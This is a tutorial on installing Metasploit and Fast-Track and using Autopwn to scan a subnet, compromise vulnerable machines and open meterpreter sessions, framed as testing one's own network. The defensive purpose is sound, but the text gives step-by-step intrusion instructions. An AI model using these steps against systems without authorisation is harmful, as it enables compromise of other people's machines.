Automated penetration testing tools are a two edged sword: they make it easy to check for well known vulnerabilities on your network, but they can also be used by hackers to try to compromise any vulnerable machines on your network.
Since they are quick and easy to use they can be used by unskilled hackers or script kiddies – which makes it all the more important that you run these tools yourself so you can fix any vulnerabilities you find before they are exploited by others.
A good tool to start with is Fast-Track, a relatively new Python-based open-source project. Parts of Fast-Track rely on the Metasploit Framework , so as well as Fast-Track we'll need to install that as well. In this How To we'll be using a system running Ubuntu 9.10 – you may need to make adjustments if you are using a different Linux distro.
Downloading and Installing Metasploit and Supporting Packages.
Before downloading Metasploit, install the supporting packages:
# apt-get install ruby libruby rdoc
# apt-get install libyaml-ruby
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
# apt-get install libdl-ruby
# apt-get install libiconv-ruby
# apt-get install rubygems
Then navigate to your home directory and download Metasploit itself. The easiest way to do this is using subversion: ensure that subversion is installed on your system (if not you can get it using sudo apt-get install subversion) then:
svn co https://metasploit.com/svn/framework3/trunk/
Downloading and Installing Fast-Track
To download Fast-Track, navigate again to your home directory and type:
svn co http://svn.thepentest.com/fasttrack/
Next, move to the newly downloaded fasttrack directory and install Fast-Track:
python setup.py install
You'll be asked for the path to the Metasploit installation you downloaded earlier, and then with any luck Fast-Track will install with all its dependencies. If this doesn't work, the documentation states the required Python modules you might need to install manually include: PExpect, FreeTDS, PYMSSQL, ClientForms, Beautiful Soup, PyMills, and Psyco – you'll be able to download them via Ubuntu's Synaptic package manger. You'll also need Nmap and SQLite3.
Once Fast-Track is installed, run Fast-Track in menu mode:
python fast-track.py --i
Fast-Track will check all the required packages are installed, and if so, you'll see the Fast-Track main menu (below).
The first thing to do is update the whole installation by selecting option 1 (Fast-Track Updates) followed by option 10 on the update menu (Update Everything). This can take a little time - about enough to go and get a cup of coffee. Once the process has completed we are ready to get testing.
Using Metasploit's Autopwn with Fast-Track
The test we are going to run in this article is Metasploit's built-in Autopwn function. It's a fairly straightforward process when carried out directly using Metasploit, but Fast-Track automates the whole thing, taking control of Metasploit and doing all the work for us.
To get started, choose option 2 (Autopwn Automation) from the main Fast-Track menu, and enter the IP range you would like to scan for vulnerabilities as if you were using Nmap. For example, type 192.168.1.1-254 to scan a whole 192.168.1 subnet
Then choose option 1 for a bind shell.
A word of caution: the autopwn process could cause applications or systems on the machines being scanned to crash, so it's wise to choose when to carry out this test carefully.
After the autopwn process completes, which can take anything from 5 minutes to an hour or so, you'll either get the message "No sessions", in which case none of the machines on your network could be compromised, or "Active sessions" with a list of machines that have been compromised.
In the screenshot below, the machine at 192.168.1.9 running Fast-Track has pwned (compromised) the machine at 192.168.1.16 using four different vulnerabilities, delivering the meterpreter payload, which we will take a look at in a moment.
Typing sessions --v displays the exploits which were used to pwn the machine.
By typing sessions --i 1 you can now access the pwned machine using the first vulnerability (or replace the 1 with a 2, 3, or 4 to use one of the other three vulnerabilities,) and drop into a meterpreter prompt.